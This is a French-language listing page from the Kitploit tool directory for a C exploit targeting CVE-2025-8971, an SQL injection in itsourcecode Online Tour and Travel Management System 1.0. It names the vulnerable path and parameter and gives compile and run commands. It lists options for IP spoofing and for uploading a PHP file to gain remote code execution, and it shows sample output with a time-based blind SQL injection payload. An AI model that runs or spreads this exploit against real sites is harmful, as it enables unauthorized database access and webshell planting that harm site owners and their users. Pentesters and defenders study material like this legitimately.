Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-8971 — Injection SQL dans itsourcecode Online Tour and Travel Management System 1.0. | Kitploit
Outils/GitHubGitHub/bytereaper77/cve-2025-8971
Génération de PayloadsAnalyse des VulnérabilitésAnalyse de CodeExploitationExploitation d'Applications WebTests d'IntrusionArchived
GitHubbytereaper77/cve-2025-8971

CVE-2025-8971

Injection SQL dans itsourcecode Online Tour and Travel Management System 1.0.

Voir le dépôt
12il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-8971 (Injection SQL)

Auteur : Byte Reaper

Description :

Cet exploit concerne CVE-2025-8971, une vulnérabilité d'injection SQL dans itsourcecode Online Tour and Travel Management System 1.0. La vulnérabilité se trouve dans /admin/operations/travellers.php et peut être exploitée à distance via le paramètre val-username.

Fonctionnement

L'exploit envoie des requêtes HTTP POST spécialement conçues à l'URL cible.

Les payloads sont encodés et injectés dans val-username.

Un téléchargement de fichier optionnel (.php ou image) peut être utilisé pour obtenir une exécution de code à distance.

Le script vérifie les réponses pour confirmer si le payload a été exécuté avec succès.

Prérequis :

root@kitploit:~
GCC compiler (gcc)

Linux x86_64 

ibcurl 

Compilation :

root@kitploit:~
    gcc script.c argparse.c -o CVE-2025-8971 -lcurl
    ./CVE-2025-8971 -u http://<target> -v [verbose mode]

Utilisation:

root@kitploit:~
-h, --help help message -u, --url Target Url (BASE URL) -c, --cookies File cookies -i, --ip Fake Ip (Host request) -f, --file File upload (.php / image) -v, --verbose Verbose Mode

Exemple d'exécution :

root@kitploit:~
[+] Start encode Payload in Request (username=)
[+] Encode Payload : AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))bAKL)%20AND%20'b'='b'
[+] Original Payload (Not encode) : AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'b'='b'
[+] POST Request Sent
[+] FULL URL : http://127.0.0.1/code/admin/operations/travellers.php
[+] File Upload : test.php
[+] File written successfully
....

Licence :

MIT License

Télécharger l’outil